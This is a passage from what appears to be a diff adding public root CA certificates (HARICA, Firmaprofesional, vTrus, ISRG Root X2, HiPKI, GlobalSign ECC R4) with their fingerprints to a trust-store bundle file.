+n56eY+hz2vYGqU8ftPkLHzmMmiDQfgbU7DTZhrx1W4eI8NLZ1KMKsmwb60ksPqxd +2JQDoOw05TDENX37Jk0bbjBU2PWARZw5rZzJJQRNmpA+TkBuimvNKWfGzC3gdOgF +VwpIUPp6Q9p+7FuaDmJ2/uqdHYVy7BG7NegfJ7/Boce7SBbdVtfMTqDhuazb1YMZ +GoXRlJfXyqNlC/M4+QKu3fZnz8k/9YosRxqZbwUN/dAdgjH8KcwAWJeRTIAAHDOF +li/LQcKLEITDCSSJH7UP2dl3RxiSlGBcx5kDPP73lad9UKGAwqmDrViWVSHbhlnU +r8a83YFuB9tgYv7sEG7aaAH0gxupPqJbI9dkxt/con3YS7qC0lH4Zr8GRuR5KiY2 +eY8fTpkdso8MDhz/yV3A/ZAQprE38806JG60hZC/gLkMjNWb1sjxVj8agIl6qeIb +MlEsPvLfe/ZdeikZjuXIvTZxi11Mwh0/rViizz1wTaZQmCXcI/m4WEEIcb9PuISg +jwBUFfyRbVinljvrS5YnzWuioYasDXxU5mZMZl+QviGaAkYt5IPCgLnPSz7ofzwB +7I9ezX/SKEIBlYrilz0QIX32nRzFNKHsLA4KUiwSVXAkPcvCFDVDXSdOvsC9qnyW +5/yeYa1E0wCXAgMBAAGjYzBhMB0GA1UdDgQWBBQGmpsfU33x9aTI04Y+oXNZtPdE +ITAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFAaamx9TffH1pMjThj6hc1m0 +90QhMA4GA1UdDwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEAqgVutt0Vyb+z +xiD2BkewhpMl0425yAA/l/VSJ4hxyXT968pk21vvHl26v9Hr7lxpuhbI87mP0zYu +QEkHDVneixCwSQXi/5E/S7fdAo74gShczNxtr18UnH1YeA32gAm56Q6XKRm4t+v4 +FstVEuTGfbvE7Pi1HE4+Z7/FXxttbUcoqgRYYdZ2vyJ/0Adqp2RT8JeNnYA/u8EH +22Wv5psymsNUk8QcCMNE+3tjEUPRahphanltkE8pjkcFwRJpadbGNjHh/PqAulxP +xOu3Mqz4dWEX1xAZufHSCe96Qp1bWgvUxpVOKs7/B9dPfhgGiPEZtdmYu65xxBzn +dFlY7wyJz4sfdZMaBBSSSFCp61cpABbjNhzI+L/wM9VBD8TMPN3pM0MBkRArHtG5 +Xc0yGYuPjCB31yLEQtyEFpslbei0VXF/sHyz03FJuc9SpAQ/3D2gu68zngowYI7b +nV2UqL1g52KAdoGDDIzMMEZJ4gzSqK/rYXHv5yJiqfdcZGyfFoxnNidF9Ql7v/YQ +CvGwjVRDjAS6oz/v4jXH+XTgbzRB0L9zZVcg+ZtnemZoJE6AZb0QmQZZ8mWvuMZH +u/2QeItBcy6vVR/cO5JyboTT0GFMDcx2V+IthSIVNg3rAZ3r2OvEhJn7wAzMMujj +d9qDRIueVSjAi1jTkD5OGwDxFa2DK5o= +-----END CERTIFICATE----- + +# Issuer: CN=HARICA TLS RSA Root CA 2021 O=Hellenic Academic and Research Institutions CA +# Subject: CN=HARICA TLS RSA Root CA 2021 O=Hellenic Academic and Research Institutions CA +# Label: "HARICA TLS RSA Root CA 2021" +# Serial: 76817823531813593706434026085292783742 +# MD5 Fingerprint: 65:47:9b:58:86:dd:2c:f0:fc:a2:84:1f:1e:96:c4:91 +# SHA1 Fingerprint: 02:2d:05:82:fa:88:ce:14:0c:06:79:de:7f:14:10:e9:45:d7:a5:6d +# SHA256 Fingerprint: d9:5d:0e:8e:da:79:52:5b:f9:be:b1:1b:14:d2:10:0d:32:94:98:5f:0c:62:d9:fa:bd:9c:d9:99:ec:cb:7b:1d +-----BEGIN 
CERTIFICATE----- +MIIFpDCCA4ygAwIBAgIQOcqTHO9D88aOk8f0ZIk4fjANBgkqhkiG9w0BAQsFADBs +MQswCQYDVQQGEwJHUjE3MDUGA1UECgwuSGVsbGVuaWMgQWNhZGVtaWMgYW5kIFJl +c2VhcmNoIEluc3RpdHV0aW9ucyBDQTEkMCIGA1UEAwwbSEFSSUNBIFRMUyBSU0Eg +Um9vdCBDQSAyMDIxMB4XDTIxMDIxOTEwNTUzOFoXDTQ1MDIxMzEwNTUzN1owbDEL +MAkGA1UEBhMCR1IxNzA1BgNVBAoMLkhlbGxlbmljIEFjYWRlbWljIGFuZCBSZXNl +YXJjaCBJbnN0aXR1dGlvbnMgQ0ExJDAiBgNVBAMMG0hBUklDQSBUTFMgUlNBIFJv +b3QgQ0EgMjAyMTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIvC569l +mwVnlskNJLnQDmT8zuIkGCyEf3dRywQRNrhe7Wlxp57kJQmXZ8FHws+RFjZiPTgE +4VGC/6zStGndLuwRo0Xua2s7TL+MjaQenRG56Tj5eg4MmOIjHdFOY9TnuEFE+2uv +a9of08WRiFukiZLRgeaMOVig1mlDqa2YUlhu2wr7a89o+uOkXjpFc5gH6l8Cct4M +pbOfrqkdtx2z/IpZ525yZa31MJQjB/OCFks1mJxTuy/K5FrZx40d/JiZ+yykgmvw +Kh+OC19xXFyuQnspiYHLA6OZyoieC0AJQTPb5lh6/a6ZcMBaD9YThnEvdmn8kN3b +LW7R8pv1GmuebxWMevBLKKAiOIAkbDakO/IwkfN4E8/BPzWr8R0RI7VDIp4BkrcY +AuUR0YLbFQDMYTfBKnya4dC6s1BG7oKsnTH4+yPiAwBIcKMJJnkVU2DzOFytOOqB +AGMUuTNe3QvboEUHGjMJ+E20pwKmafTCWQWIZYVWrkvL4N48fS0ayOn7H6NhStYq +E613TBoYm5EPWNgGVMWX+Ko/IIqmhaZ39qb8HOLubpQzKoNQhArlT4b4UEV4AIHr +W2jjJo3Me1xR9BQsQL4aYB16cmEdH2MtiKrOokWQCPxrvrNQKlr9qEgYRtaQQJKQ +CoReaDH46+0N0x3GfZkYVVYnZS6NRcUk7M7jAgMBAAGjQjBAMA8GA1UdEwEB/wQF +MAMBAf8wHQYDVR0OBBYEFApII6ZgpJIKM+qTW8VX6iVNvRLuMA4GA1UdDwEB/wQE +AwIBhjANBgkqhkiG9w0BAQsFAAOCAgEAPpBIqm5iFSVmewzVjIuJndftTgfvnNAU +X15QvWiWkKQUEapobQk1OUAJ2vQJLDSle1mESSmXdMgHHkdt8s4cUCbjnj1AUz/3 +f5Z2EMVGpdAgS1D0NTsY9FVqQRtHBmg8uwkIYtlfVUKqrFOFrJVWNlar5AWMxaja +H6NpvVMPxP/cyuN+8kyIhkdGGvMA9YCRotxDQpSbIPDRzbLrLFPCU3hKTwSUQZqP +JzLB5UkZv/HywouoCjkxKLR9YjYsTewfM7Z+d21+UPCfDtcRj88YxeMn/ibvBZ3P +zzfF0HvaO7AWhAw6k9a+F9sPPg4ZeAnHqQJyIkv3N3a6dcSFA1pj1bF1BcK5vZSt +jBWZp5N99sXzqnTPBIWUmAD04vnKJGW/4GKvyMX6ssmeVkjaef2WdhW+o45WxLM0 +/L5H9MG0qPzVMIho7suuyWPEdr6sOBjhXlzPrjoiUevRi7PzKzMHVIf6tLITe7pT +BGIBnfHAT+7hOtSLIBD6Alfm78ELt5BGnBkpjNxvoEppaZS3JGWg/6w/zgH7IS79 +aPib8qXPMThcFarmlwDB31qlpzmq6YR/PFGoOtmUW4y/Twhx5duoXNTSpv4Ao8YW +xw/ogM4cKGR0GQjTQuPOAF1/sdwTsOEFy9EgqoZ0njnnkf3/W9b3raYvAwtt41dU +63ZTGI0RmLo= +-----END CERTIFICATE----- + +# Issuer: CN=HARICA TLS ECC Root CA 2021 O=Hellenic Academic and Research Institutions CA +# Subject: CN=HARICA TLS ECC Root CA 2021 O=Hellenic Academic and Research Institutions CA +# Label: "HARICA TLS ECC Root CA 2021" +# Serial: 137515985548005187474074462014555733966 +# MD5 Fingerprint: ae:f7:4c:e5:66:35:d1:b7:9b:8c:22:93:74:d3:4b:b0 +# SHA1 Fingerprint: bc:b0:c1:9d:e9:98:92:70:19:38:57:e9:8d:a7:b4:5d:6e:ee:01:48 +# SHA256 Fingerprint: 3f:99:cc:47:4a:cf:ce:4d:fe:d5:87:94:66:5e:47:8d:15:47:73:9f:2e:78:0f:1b:b4:ca:9b:13:30:97:d4:01 +-----BEGIN CERTIFICATE----- +MIICVDCCAdugAwIBAgIQZ3SdjXfYO2rbIvT/WeK/zjAKBggqhkjOPQQDAzBsMQsw +CQYDVQQGEwJHUjE3MDUGA1UECgwuSGVsbGVuaWMgQWNhZGVtaWMgYW5kIFJlc2Vh +cmNoIEluc3RpdHV0aW9ucyBDQTEkMCIGA1UEAwwbSEFSSUNBIFRMUyBFQ0MgUm9v +dCBDQSAyMDIxMB4XDTIxMDIxOTExMDExMFoXDTQ1MDIxMzExMDEwOVowbDELMAkG +A1UEBhMCR1IxNzA1BgNVBAoMLkhlbGxlbmljIEFjYWRlbWljIGFuZCBSZXNlYXJj +aCBJbnN0aXR1dGlvbnMgQ0ExJDAiBgNVBAMMG0hBUklDQSBUTFMgRUNDIFJvb3Qg +Q0EgMjAyMTB2MBAGByqGSM49AgEGBSuBBAAiA2IABDgI/rGgltJ6rK9JOtDA4MM7 +KKrxcm1lAEeIhPyaJmuqS7psBAqIXhfyVYf8MLA04jRYVxqEU+kw2anylnTDUR9Y +STHMmE5gEYd103KUkE+bECUqqHgtvpBBWJAVcqeht6NCMEAwDwYDVR0TAQH/BAUw +AwEB/zAdBgNVHQ4EFgQUyRtTgRL+BNUW0aq8mm+3oJUZbsowDgYDVR0PAQH/BAQD +AgGGMAoGCCqGSM49BAMDA2cAMGQCMBHervjcToiwqfAircJRQO9gcS3ujwLEXQNw +SaSS6sUUiHCm0w2wqsosQJz76YJumgIwK0eaB8bRwoF8yguWGEEbo/QwCZ61IygN +nxS2PFOiTAZpffpskcYqSUXm7LcT4Tps +-----END CERTIFICATE----- + +# Issuer: CN=Autoridad de Certificacion Firmaprofesional CIF A62634068 +# Subject: 
CN=Autoridad de Certificacion Firmaprofesional CIF A62634068 +# Label: "Autoridad de Certificacion Firmaprofesional CIF A62634068" +# Serial: 1977337328857672817 +# MD5 Fingerprint: 4e:6e:9b:54:4c:ca:b7:fa:48:e4:90:b1:15:4b:1c:a3 +# SHA1 Fingerprint: 0b:be:c2:27:22:49:cb:39:aa:db:35:5c:53:e3:8c:ae:78:ff:b6:fe +# SHA256 Fingerprint: 57:de:05:83:ef:d2:b2:6e:03:61:da:99:da:9d:f4:64:8d:ef:7e:e8:44:1c:3b:72:8a:fa:9b:cd:e0:f9:b2:6a +-----BEGIN CERTIFICATE----- +MIIGFDCCA/ygAwIBAgIIG3Dp0v+ubHEwDQYJKoZIhvcNAQELBQAwUTELMAkGA1UE +BhMCRVMxQjBABgNVBAMMOUF1dG9yaWRhZCBkZSBDZXJ0aWZpY2FjaW9uIEZpcm1h +cHJvZmVzaW9uYWwgQ0lGIEE2MjYzNDA2ODAeFw0xNDA5MjMxNTIyMDdaFw0zNjA1 +MDUxNTIyMDdaMFExCzAJBgNVBAYTAkVTMUIwQAYDVQQDDDlBdXRvcmlkYWQgZGUg +Q2VydGlmaWNhY2lvbiBGaXJtYXByb2Zlc2lvbmFsIENJRiBBNjI2MzQwNjgwggIi +MA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDKlmuO6vj78aI14H9M2uDDUtd9 +thDIAl6zQyrET2qyyhxdKJp4ERppWVevtSBC5IsP5t9bpgOSL/UR5GLXMnE42QQM +cas9UX4PB99jBVzpv5RvwSmCwLTaUbDBPLutN0pcyvFLNg4kq7/DhHf9qFD0sefG +L9ItWY16Ck6WaVICqjaY7Pz6FIMMNx/Jkjd/14Et5cS54D40/mf0PmbR0/RAz15i +NA9wBj4gGFrO93IbJWyTdBSTo3OxDqqHECNZXyAFGUftaI6SEspd/NYrspI8IM/h +X68gvqB2f3bl7BqGYTM+53u0P6APjqK5am+5hyZvQWyIplD9amML9ZMWGxmPsu2b +m8mQ9QEM3xk9Dz44I8kvjwzRAv4bVdZO0I08r0+k8/6vKtMFnXkIoctXMbScyJCy +Z/QYFpM6/EfY0XiWMR+6KwxfXZmtY4laJCB22N/9q06mIqqdXuYnin1oKaPnirja +EbsXLZmdEyRG98Xi2J+Of8ePdG1asuhy9azuJBCtLxTa/y2aRnFHvkLfuwHb9H/T +KI8xWVvTyQKmtFLKbpf7Q8UIJm+K9Lv9nyiqDdVF8xM6HdjAeI9BZzwelGSuewvF +6NkBiDkal4ZkQdU7hwxu+g/GvUgUvzlN1J5Bto+WHWOWk9mVBngxaJ43BjuAiUVh +OSPHG0SjFeUc+JIwuwIDAQABo4HvMIHsMB0GA1UdDgQWBBRlzeurNR4APn7VdMAc +tHNHDhpkLzASBgNVHRMBAf8ECDAGAQH/AgEBMIGmBgNVHSAEgZ4wgZswgZgGBFUd +IAAwgY8wLwYIKwYBBQUHAgEWI2h0dHA6Ly93d3cuZmlybWFwcm9mZXNpb25hbC5j +b20vY3BzMFwGCCsGAQUFBwICMFAeTgBQAGEAcwBlAG8AIABkAGUAIABsAGEAIABC +AG8AbgBhAG4AbwB2AGEAIAA0ADcAIABCAGEAcgBjAGUAbABvAG4AYQAgADAAOAAw +ADEANzAOBgNVHQ8BAf8EBAMCAQYwDQYJKoZIhvcNAQELBQADggIBAHSHKAIrdx9m +iWTtj3QuRhy7qPj4Cx2Dtjqn6EWKB7fgPiDL4QjbEwj4KKE1soCzC1HA01aajTNF +Sa9J8OA9B3pFE1r/yJfY0xgsfZb43aJlQ3CTkBW6kN/oGbDbLIpgD7dvlAceHabJ +hfa9NPhAeGIQcDq+fUs5gakQ1JZBu/hfHAsdCPKxsIl68veg4MSPi3i1O1ilI45P +Vf42O+AMt8oqMEEgtIDNrvx2ZnOorm7hfNoD6JQg5iKj0B+QXSBTFCZX2lSX3xZE +EAEeiGaPcjiT3SC3NL7X8e5jjkd5KAb881lFJWAiMxujX6i6KtoaPc1A6ozuBRWV +1aUsIC+nmCjuRfzxuIgALI9C2lHVnOUTaHFFQ4ueCyE8S1wF3BqfmI7avSKecs2t +CsvMo2ebKHTEm9caPARYpoKdrcd7b/+Alun4jWq9GJAd/0kakFI3ky88Al2CdgtR +5xbHV/g4+afNmyJU72OwFW1TZQNKXkqgsqeOSQBZONXH9IBk9W6VULgRfhVwOEqw +f9DEMnDAGf/JOC0ULGb0QkTmVXYbgBVX/8Cnp6o5qtjTcNAuuuuUavpfNIbnYrX9 +ivAwhZTJryQCL2/W3Wf+47BVTwSYT6RBVuKT0Gro1vP7ZeDOdcQxWQzugsgMYDNK +GbqEZycPvEJdvSRUDewdcAZfpLz6IHxV +-----END CERTIFICATE----- + +# Issuer: CN=vTrus ECC Root CA O=iTrusChina Co.,Ltd. +# Subject: CN=vTrus ECC Root CA O=iTrusChina Co.,Ltd. 
+# Label: "vTrus ECC Root CA" +# Serial: 630369271402956006249506845124680065938238527194 +# MD5 Fingerprint: de:4b:c1:f5:52:8c:9b:43:e1:3e:8f:55:54:17:8d:85 +# SHA1 Fingerprint: f6:9c:db:b0:fc:f6:02:13:b6:52:32:a6:a3:91:3f:16:70:da:c3:e1 +# SHA256 Fingerprint: 30:fb:ba:2c:32:23:8e:2a:98:54:7a:f9:79:31:e5:50:42:8b:9b:3f:1c:8e:eb:66:33:dc:fa:86:c5:b2:7d:d3 +-----BEGIN CERTIFICATE----- +MIICDzCCAZWgAwIBAgIUbmq8WapTvpg5Z6LSa6Q75m0c1towCgYIKoZIzj0EAwMw +RzELMAkGA1UEBhMCQ04xHDAaBgNVBAoTE2lUcnVzQ2hpbmEgQ28uLEx0ZC4xGjAY +BgNVBAMTEXZUcnVzIEVDQyBSb290IENBMB4XDTE4MDczMTA3MjY0NFoXDTQzMDcz +MTA3MjY0NFowRzELMAkGA1UEBhMCQ04xHDAaBgNVBAoTE2lUcnVzQ2hpbmEgQ28u +LEx0ZC4xGjAYBgNVBAMTEXZUcnVzIEVDQyBSb290IENBMHYwEAYHKoZIzj0CAQYF +K4EEACIDYgAEZVBKrox5lkqqHAjDo6LN/llWQXf9JpRCux3NCNtzslt188+cToL0 +v/hhJoVs1oVbcnDS/dtitN9Ti72xRFhiQgnH+n9bEOf+QP3A2MMrMudwpremIFUd +e4BdS49nTPEQo0IwQDAdBgNVHQ4EFgQUmDnNvtiyjPeyq+GtJK97fKHbH88wDwYD +VR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwCgYIKoZIzj0EAwMDaAAwZQIw +V53dVvHH4+m4SVBrm2nDb+zDfSXkV5UTQJtS0zvzQBm8JsctBp61ezaf9SXUY2sA +AjEA6dPGnlaaKsyh2j/IZivTWJwghfqrkYpwcBE4YGQLYgmRWAD5Tfs0aNoJrSEG +GJTO +-----END CERTIFICATE----- + +# Issuer: CN=vTrus Root CA O=iTrusChina Co.,Ltd. +# Subject: CN=vTrus Root CA O=iTrusChina Co.,Ltd. +# Label: "vTrus Root CA" +# Serial: 387574501246983434957692974888460947164905180485 +# MD5 Fingerprint: b8:c9:37:df:fa:6b:31:84:64:c5:ea:11:6a:1b:75:fc +# SHA1 Fingerprint: 84:1a:69:fb:f5:cd:1a:25:34:13:3d:e3:f8:fc:b8:99:d0:c9:14:b7 +# SHA256 Fingerprint: 8a:71:de:65:59:33:6f:42:6c:26:e5:38:80:d0:0d:88:a1:8d:a4:c6:a9:1f:0d:cb:61:94:e2:06:c5:c9:63:87 +-----BEGIN CERTIFICATE----- +MIIFVjCCAz6gAwIBAgIUQ+NxE9izWRRdt86M/TX9b7wFjUUwDQYJKoZIhvcNAQEL +BQAwQzELMAkGA1UEBhMCQ04xHDAaBgNVBAoTE2lUcnVzQ2hpbmEgQ28uLEx0ZC4x +FjAUBgNVBAMTDXZUcnVzIFJvb3QgQ0EwHhcNMTgwNzMxMDcyNDA1WhcNNDMwNzMx +MDcyNDA1WjBDMQswCQYDVQQGEwJDTjEcMBoGA1UEChMTaVRydXNDaGluYSBDby4s +THRkLjEWMBQGA1UEAxMNdlRydXMgUm9vdCBDQTCCAiIwDQYJKoZIhvcNAQEBBQAD +ggIPADCCAgoCggIBAL1VfGHTuB0EYgWgrmy3cLRB6ksDXhA/kFocizuwZotsSKYc +IrrVQJLuM7IjWcmOvFjai57QGfIvWcaMY1q6n6MLsLOaXLoRuBLpDLvPbmyAhykU +AyyNJJrIZIO1aqwTLDPxn9wsYTwaP3BVm60AUn/PBLn+NvqcwBauYv6WTEN+VRS+ +GrPSbcKvdmaVayqwlHeFXgQPYh1jdfdr58tbmnDsPmcF8P4HCIDPKNsFxhQnL4Z9 +8Cfe/+Z+M0jnCx5Y0ScrUw5XSmXX+6KAYPxMvDVTAWqXcoKv8R1w6Jz1717CbMdH +flqUhSZNO7rrTOiwCcJlwp2dCZtOtZcFrPUGoPc2BX70kLJrxLT5ZOrpGgrIDajt +J8nU57O5q4IikCc9Kuh8kO+8T/3iCiSn3mUkpF3qwHYw03dQ+A0Em5Q2AXPKBlim +0zvc+gRGE1WKyURHuFE5Gi7oNOJ5y1lKCn+8pu8fA2dqWSslYpPZUxlmPCdiKYZN +pGvu/9ROutW04o5IWgAZCfEF2c6Rsffr6TlP9m8EQ5pV9T4FFL2/s1m02I4zhKOQ +UqqzApVg+QxMaPnu1RcN+HFXtSXkKe5lXa/R7jwXC1pDxaWG6iSe4gUH3DRCEpHW +OXSuTEGC2/KmSNGzm/MzqvOmwMVO9fSddmPmAsYiS8GVP1BkLFTltvA8Kc9XAgMB +AAGjQjBAMB0GA1UdDgQWBBRUYnBj8XWEQ1iO0RYgscasGrz2iTAPBgNVHRMBAf8E +BTADAQH/MA4GA1UdDwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEAKbqSSaet +8PFww+SX8J+pJdVrnjT+5hpk9jprUrIQeBqfTNqK2uwcN1LgQkv7bHbKJAs5EhWd +nxEt/Hlk3ODg9d3gV8mlsnZwUKT+twpw1aA08XXXTUm6EdGz2OyC/+sOxL9kLX1j +bhd47F18iMjrjld22VkE+rxSH0Ws8HqA7Oxvdq6R2xCOBNyS36D25q5J08FsEhvM +Kar5CKXiNxTKsbhm7xqC5PD48acWabfbqWE8n/Uxy+QARsIvdLGx14HuqCaVvIiv +TDUHKgLKeBRtRytAVunLKmChZwOgzoy8sHJnxDHO2zTlJQNgJXtxmOTAGytfdELS +S8VZCAeHvsXDf+eW2eHcKJfWjwXj9ZtOyh1QRwVTsMo554WgicEFOwE30z9J4nfr +I8iIZjs9OXYhRvHsXyO466JmdXTBQPfYaJqT4i2pLr0cox7IdMakLXogqzu4sEb9 +b91fUlV1YvCXoHzXOP0l382gmxDPi7g4Xl7FtKYCNqEeXxzP4padKar9mK5S4fNB +UvupLnKWnyfjqnN9+BojZns7q2WwMgFLFT49ok8MKzWixtlnEjUwzXYuFrOZnk1P +Ti07NEPhmg4NpGaXutIcSkwsKouLgU9xGqndXHt7CMUADTdA43x7VF8vhV929ven +sBxXVsFy6K2ir40zSbofitzmdHxghm+Hl3s= +-----END CERTIFICATE----- + +# 
Issuer: CN=ISRG Root X2 O=Internet Security Research Group +# Subject: CN=ISRG Root X2 O=Internet Security Research Group +# Label: "ISRG Root X2" +# Serial: 87493402998870891108772069816698636114 +# MD5 Fingerprint: d3:9e:c4:1e:23:3c:a6:df:cf:a3:7e:6d:e0:14:e6:e5 +# SHA1 Fingerprint: bd:b1:b9:3c:d5:97:8d:45:c6:26:14:55:f8:db:95:c7:5a:d1:53:af +# SHA256 Fingerprint: 69:72:9b:8e:15:a8:6e:fc:17:7a:57:af:b7:17:1d:fc:64:ad:d2:8c:2f:ca:8c:f1:50:7e:34:45:3c:cb:14:70 +-----BEGIN CERTIFICATE----- +MIICGzCCAaGgAwIBAgIQQdKd0XLq7qeAwSxs6S+HUjAKBggqhkjOPQQDAzBPMQsw +CQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFyY2gg +R3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMjAeFw0yMDA5MDQwMDAwMDBaFw00 +MDA5MTcxNjAwMDBaME8xCzAJBgNVBAYTAlVTMSkwJwYDVQQKEyBJbnRlcm5ldCBT +ZWN1cml0eSBSZXNlYXJjaCBHcm91cDEVMBMGA1UEAxMMSVNSRyBSb290IFgyMHYw +EAYHKoZIzj0CAQYFK4EEACIDYgAEzZvVn4CDCuwJSvMWSj5cz3es3mcFDR0HttwW ++1qLFNvicWDEukWVEYmO6gbf9yoWHKS5xcUy4APgHoIYOIvXRdgKam7mAHf7AlF9 +ItgKbppbd9/w+kHsOdx1ymgHDB/qo0IwQDAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0T +AQH/BAUwAwEB/zAdBgNVHQ4EFgQUfEKWrt5LSDv6kviejM9ti6lyN5UwCgYIKoZI +zj0EAwMDaAAwZQIwe3lORlCEwkSHRhtFcP9Ymd70/aTSVaYgLXTWNLxBo1BfASdW +tL4ndQavEi51mI38AjEAi/V3bNTIZargCyzuFJ0nN6T5U6VR5CmD1/iQMVtCnwr1 +/q4AaOeMSQ+2b1tbFfLn +-----END CERTIFICATE----- + +# Issuer: CN=HiPKI Root CA - G1 O=Chunghwa Telecom Co., Ltd. +# Subject: CN=HiPKI Root CA - G1 O=Chunghwa Telecom Co., Ltd. +# Label: "HiPKI Root CA - G1" +# Serial: 60966262342023497858655262305426234976 +# MD5 Fingerprint: 69:45:df:16:65:4b:e8:68:9a:8f:76:5f:ff:80:9e:d3 +# SHA1 Fingerprint: 6a:92:e4:a8:ee:1b:ec:96:45:37:e3:29:57:49:cd:96:e3:e5:d2:60 +# SHA256 Fingerprint: f0:15:ce:3c:c2:39:bf:ef:06:4b:e9:f1:d2:c4:17:e1:a0:26:4a:0a:94:be:1f:0c:8d:12:18:64:eb:69:49:cc +-----BEGIN CERTIFICATE----- +MIIFajCCA1KgAwIBAgIQLd2szmKXlKFD6LDNdmpeYDANBgkqhkiG9w0BAQsFADBP +MQswCQYDVQQGEwJUVzEjMCEGA1UECgwaQ2h1bmdod2EgVGVsZWNvbSBDby4sIEx0 +ZC4xGzAZBgNVBAMMEkhpUEtJIFJvb3QgQ0EgLSBHMTAeFw0xOTAyMjIwOTQ2MDRa +Fw0zNzEyMzExNTU5NTlaME8xCzAJBgNVBAYTAlRXMSMwIQYDVQQKDBpDaHVuZ2h3 +YSBUZWxlY29tIENvLiwgTHRkLjEbMBkGA1UEAwwSSGlQS0kgUm9vdCBDQSAtIEcx +MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA9B5/UnMyDHPkvRN0o9Qw +qNCuS9i233VHZvR85zkEHmpwINJaR3JnVfSl6J3VHiGh8Ge6zCFovkRTv4354twv +Vcg3Px+kwJyz5HdcoEb+d/oaoDjq7Zpy3iu9lFc6uux55199QmQ5eiY29yTw1S+6 +lZgRZq2XNdZ1AYDgr/SEYYwNHl98h5ZeQa/rh+r4XfEuiAU+TCK72h8q3VJGZDnz +Qs7ZngyzsHeXZJzA9KMuH5UHsBffMNsAGJZMoYFL3QRtU6M9/Aes1MU3guvklQgZ +KILSQjqj2FPseYlgSGDIcpJQ3AOPgz+yQlda22rpEZfdhSi8MEyr48KxRURHH+CK +FgeW0iEPU8DtqX7UTuybCeyvQqww1r/REEXgphaypcXTT3OUM3ECoWqj1jOXTyFj +HluP2cFeRXF3D4FdXyGarYPM+l7WjSNfGz1BryB1ZlpK9p/7qxj3ccC2HTHsOyDr +y+K49a6SsvfhhEvyovKTmiKe0xRvNlS9H15ZFblzqMF8b3ti6RZsR1pl8w4Rm0bZ +/W3c1pzAtH2lsN0/Vm+h+fbkEkj9Bn8SV7apI09bA8PgcSojt/ewsTu8mL3WmKgM +a/aOEmem8rJY5AIJEzypuxC00jBF8ez3ABHfZfjcK0NVvxaXxA/VLGGEqnKG/uY6 +fsI/fe78LxQ+5oXdUG+3Se0CAwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAdBgNV +HQ4EFgQU8ncX+l6o/vY9cdVouslGDDjYr7AwDgYDVR0PAQH/BAQDAgGGMA0GCSqG +SIb3DQEBCwUAA4ICAQBQUfB13HAE4/+qddRxosuej6ip0691x1TPOhwEmSKsxBHi +7zNKpiMdDg1H2DfHb680f0+BazVP6XKlMeJ45/dOlBhbQH3PayFUhuaVevvGyuqc +SE5XCV0vrPSltJczWNWseanMX/mF+lLFjfiRFOs6DRfQUsJ748JzjkZ4Bjgs6Fza +ZsT0pPBWGTMpWmWSBUdGSquEwx4noR8RkpkndZMPvDY7l1ePJlsMu5wP1G4wB9Tc +XzZoZjmDlicmisjEOf6aIW/Vcobpf2Lll07QJNBAsNB1CI69aO4I1258EHBGG3zg +iLKecoaZAeO/n0kZtCW+VmWuF2PlHt/o/0elv+EmBYTksMCv5wiZqAxeJoBF1Pho +L5aPruJKHJwWDBNvOIf2u8g0X5IDUXlwpt/L9ZlNec1OvFefQ05rLisY+GpzjLrF +Ne85akEez3GoorKGB1s6yeHvP2UEgEcyRHCVTjFnanRbEEV16rCf0OY1/k6fi8wr 
+kkVbbiVghUbN0aqwdmaTd5a+g744tiROJgvM7XpWGuDpWsZkrUx6AEhEL7lAuxM+ +vhV4nYWBSipX3tUZQ9rbyltHhoMLP7YNdnhzeSJesYAfz77RP1YQmCuVh6EfnWQU +YDksswBVLuT1sw5XxJFBAJw/6KXf6vb/yPCtbVKoF6ubYfwSUTXkJf2vqmqGOQ== +-----END CERTIFICATE----- + +# Issuer: CN=GlobalSign O=GlobalSign OU=GlobalSign ECC Root CA - R4 +# Subject: CN=GlobalSign O=GlobalSign OU=GlobalSign ECC Root CA - R4 +# Label: "GlobalSign ECC Root CA - R4" +# Serial: 159662223612894884239637590694 +# MD5 Fingerprint: 26:29:f8:6d:e1:88:bf:a2:65:7f:aa:c4:cd:0f:7f:fc +# SHA1 Fingerprint: 6b:a0:b0:98:e1:71:ef:5a:ad:fe:48:15:80:77:10:f4:bd:6f:0b:28 +# SHA256 Fingerprint: b0:85:d7:0b:96:4f:19:1a:73:e4:af:0d:54:ae:7a:0e:07:aa:fd:af:9b:71:dd:08:62:13:8a:b7:32:5a:24:a2 +-----BEGIN CERTIFICATE----- +MIIB3DCCAYOgAwIBAgINAgPlfvU/k/2lCSGypjAKBggqhkjOPQQDAjBQMSQwIgYD +VQQLExtHbG9iYWxTaWduIEVDQyBSb290IENBIC0gUjQxEzARBgNVBAoTCkdsb2Jh +bFNpZ24xEzARBgNVBAMTCkdsb2JhbFNpZ24wHhcNMTIxMTEzMDAwMDAwWhcNMzgw +MTE5MDMxNDA3WjBQMSQwIgYDVQQLExtHbG9iYWxTaWduIEVDQyBSb290IENBIC0g +UjQxEzARBgNVBAoTCkdsb2JhbFNpZ24xEzARBgNVBAMTCkdsb2JhbFNpZ24wWTAT +BgcqhkjOPQIBBggqhkjOPQMBBwNCAAS4xnnTj2wlDp8uORkcA6SumuU5BwkWymOx +uYb4ilfBV85C+nOh92VC/x7BALJucw7/xyHlGKSq2XE/qNS5zowdo0IwQDAOBgNV +HQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUVLB7rUW44kB/ ++wpu+74zyTyjhNUwCgYIKoZIzj0EAwIDRwAwRAIgIk90crlgr/HmnKAWBVBfw147 +bmF0774BxL4YSFlhgjICICadVGNA3jdgUM/I2O2dgq43mLyjj0xMqTQrbO/7lZsm +-----END CERTIFICATE----- + +# Issuer: CN=GTS Root R1 O=Google Trust Services LLC +# Subject: CN=GTS Root R1 O=Google Trust Services LLC +# Label: "GTS Root R1" +# Serial: 159662320309726417404178440727 +# MD5 Fingerprint: 05:fe:d0:bf:71:a8:a3:76:63:da:01:e0:d8:52:dc:40 +# SHA1 Fingerprint: 